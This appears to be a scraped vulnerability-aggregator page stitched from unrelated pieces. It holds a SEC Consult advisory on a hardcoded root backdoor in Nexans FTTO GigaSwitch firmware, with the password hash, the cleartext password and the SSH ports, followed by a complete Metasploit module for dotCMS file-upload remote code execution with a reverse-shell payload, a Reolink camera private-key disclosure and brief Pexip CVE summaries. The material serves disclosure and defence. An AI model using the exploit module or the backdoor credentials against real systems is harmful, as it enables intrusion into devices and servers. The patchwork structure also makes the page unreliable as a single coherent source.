libnx_apl.so on Nexans FTTO GigaSwitch before 6.02N and 7.x before 7.02 implements a Backdoor Account for SSH logins on port 50200 or 50201.

All industrial managed FTTO GigaSwitch series from Nexans S.A. are affected by multiple vulnerabilities resulting from outdated software components embedded in the firmware. Hardcoded password hashes were also found in the firmware. Four known vulnerabilities (CVE-2017-16544, CVE-2015-0235, CVE-2015-7547 and CVE-2015-9261) were verified by emulating the device with the MEDUSA scalable firmware runtime.

**Vendor description**

"_As a global player in the cable industry, Nexans is behind the scenes delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the most complex cable applications in the most demanding environments._"

Source: https://www.nexans.com/company/What-we-do.html

**Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  products conducted by security professionals to identify and resolve all security issues.

**Vulnerability overview/description****1) Outdated Vulnerable Software Components**

A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that are used in the devices' firmware. Four of them were verified by using the MEDUSA scalable firmware runtime.

**2) Hardcoded Backdoor User (CVE-2022-32985)**

A hardcoded root user was found in "/etc/passwd". In combination with the invoked dropbear SSH daemon in the libnx\_apl.so library, it can be used on port 50201 and 50200 to login on a system shell.

**Proof of concept****1) Outdated Vulnerable Software Components**

Based on an automated scan with the IoT Inspector (ONEKEY) the following third party software packages were found to be outdated:

    Firmware version 6.02L:
    BusyBox       1.20.2 
    Dropbear SSH  2012.55
    GNU glibc     2.17
    lighttpd      1.4.48
    OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

****CVE-2015-9261 (Unzip)****

The crafted ZIP archive "x\_6170921383890712452.bin" was taken from: https://www.openwall.com/lists/oss-security/2015/10/25/3

Execution inside the firmware emulation:

    bash-4.2# unzip x_6170921383890712452.bin 
    Archive:  x_6170921383890712452.bin
      inflating: ]3j½r«IK-%Ix
    do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc
    epc = 0044bb28 in busybox[400000+99000]
    ra  = 0044b968 in busybox[400000+99000]
    Segmentation fault

****CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)****

PoC code was taken from: https://gist.github.com/dweinstein/66e6a088191ac0e8105c

****CVE-2015-7547 (getaddrinfo buffer overflow)****

PoC code was taken from: https://github.com/fjserna/CVE-2015-7547

    -bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &
    [1] 259
    -bash-4.4# chroot /medusa_rootfs/ bin/bash
    bash-4.2# cd /medusa_exploits/
    bash-4.2# ./cve-2015-7547_glibc_getaddrinfo
    [UDP] Total Data len recv 36
    [UDP] Total Data len recv 36
    Connected with 127.0.0.1:34356
    [TCP] Total Data len recv 76
    [TCP] Request1 len recv 36
    [TCP] Request2 len recv 36
    Segmentation fault

****CVE-2017-16544 (shell autocompletion vulnerability)****

A file with the name "\\ectest\\n\\e\]55;test.txt\\a" was created to trigger the vulnerability.

    # ls "pressing <TAB>"
    test
    ]55;test.txt
    #

**2) Hardcoded Backdoor User (CVE-2022-32985)**

The hardcoded system user, reachable via the dropbear SSH daemon was found due to multiple indications on the system. The undocumented root user itself was contained in the "passwd" file:  

Content of the file "/etc/passwd".

    root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh
    [...]

Update: The password for the root user is: !Nexans\_

A suspicious port for the SSH daemon was chosen in the config file of dropbear: 

Content of the file "/etc/init.d/dropbear":

    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    DAEMON=/usr/sbin/dropbear
    NAME=dropbear
    DESC="Dropbear SSH server"
    PIDFILE=/var/run/dropbear.pid
    
    DROPBEAR_PORT="50200 -p 50201"
    [...]

This is invoked from "/usr/lib/libnx\_apl.so.0.0.0", which can be seen in the  following pseudo-code:

    void dropbear_server_init(char param_1)
    
    {
      __pid_t __pid;
      char *pcVar1;
      int aiStack16 [2];
      
      __pid = fork();
      if (__pid == 0) {
        __pid = fork();
        if (__pid != 0) {
                        /* WARNING: Subroutine does not return */
          exit(0);
        }
        if (param_1 == '\0') {
          pcVar1 = "/etc/init.d/dropbear stop";
        }
        else {
          pcVar1 = "/etc/init.d/dropbear start";                               <---
        }
        execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);
      }
      else {
        waitpid(__pid,aiStack16,0);
      }
      return;
    }

This function is called if a specific command is issued in the CLI interface:

    [...]
      iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);
      if (iVar6 != 0) {
        if (param_2 < 4) {
          netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");
          iVar6 = shared_mem_get_addr(&var_shm);
          iVar7 = shared_mem_get_addr(&var_shm);
          uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);
          shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);
        if (iVar6 != 0) {
          dropbear_server_init('\x01');                                        <---
          netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);
        if (iVar6 != 0) {
          dropbear_server_init('\0');                                          <---
          netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");
          return;
        }
        netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");
        return;
    [...]

The mentioned library is used in the CLI program that is running on the device.

**Vulnerable / tested versions**

The following firmware versions have been tested:

*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L
*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

**Vendor contact timeline**

CVE-2022-32985: Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch series

Pexip Infinity before 28.1 allows remote attackers to trigger a software abort via G.719.

CVE-2022-32263: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27 before 28.0 allows remote attackers to trigger excessive resource consumption and termination because of registrar resource mishandling.

CVE-2022-29286: Pexip security bulletins | Pexip Infinity Docs

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

CVE-2022-26352: dotCMS Shell Upload ≈ Packet Storm

The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private key via the root web server directory. In this way an attacker can download the entire key via the /self.key URI.

Permalink

Cannot retrieve contributors at this time

RCE Security Advisory

https://www.rcesecurity.com

1\. ADVISORY INFORMATION

\=======================

Product: Reolink E1 Zoom Camera

Vendor URL: https://reolink.com/product/e1-zoom/

Type: Exposure of Sensitive Information to an Unauthorized Actor \[CWE-200\]

Date found: 2021-08-26

Date published: 2022-06-01

CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

CVE: CVE-2021-40149

2\. CREDITS

\==========

This vulnerability was discovered and researched by Julien Ahrens from

RCE Security.

3\. VERSIONS AFFECTED

\====================

Reolink E1 Zoom Camera 3.0.0.716 (latest) and below

4\. INTRODUCTION

\===============

Meet new generation of Reolink E1 series. Advanced features - 5MP Super

HD & optical zoom are added into this compact camera. Plus two-way audio,

remote live view and more smart capacities help you connect with what you

care. Be closer to families and be away from worries.

(from the vendor's homepage)

5\. VULNERABILITY DETAILS

\========================

The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private

key via the root web server directory.

An unauthenticated attacker can abuse this with network-level access to the

camera to download the webserver's private SSL key by simply going to the

following URL:

http://\[CAM-IP\]/self.key

6\. RISK

\=======

An unauthenticated attacker can download the webserver's SSL private key and

thereby attack the encrypted network traffic to and from the camera, which might

lead to the disclosure of the administrative access credentials and other

sensitive information.

7\. SOLUTION

\===========

None.

8\. REPORT TIMELINE

\==================

2021-08-26: Discovery of the vulnerability

2021-08-26: Sent notification to Reolink via their support channel

2021-08-26: Response from vendor asking for vulnerability details

2021-08-26: Sent all the vulnerability details

2021-08-31: Vendor is still looking into the issue

2021-09-03: Vendor states that the issue will be fixed by the end of September.

2021-10-01: Since no firmware has been released, we've sent another notification

2021-10-02: Vendor states that the new firmware is delayed

2022-02-01: Since there is still fix, sent another notification

2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.

2022-03-03: Since there is still fix, sent another notification

2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)

2022-05-24: Since there is still fix, sent another notification

2022-05-24: Vendor states that the update still hasn't been released yet.

2022-06-01: Almost a year should be enough to fix this. Public disclosure.

9\. REFERENCES

\=============

https://github.com/MrTuxracer/advisories

CVE-2021-40149: advisories/CVE-2021-40149.txt at master · MrTuxracer/advisories

Pexip Infinity before 27.3 allows remote attackers to force a software abort via HTTP.

CVE-2022-26654: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27.x before 27.2 has Improper Access Control. An attacker can sometimes join a conference (call join) if it has a lock but not a PIN.

CVE-2022-25357: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via HTTP.

CVE-2022-27929: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via Epic Telehealth.

CVE-2022-27935: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via the Session Initiation Protocol.

Tag

#ssl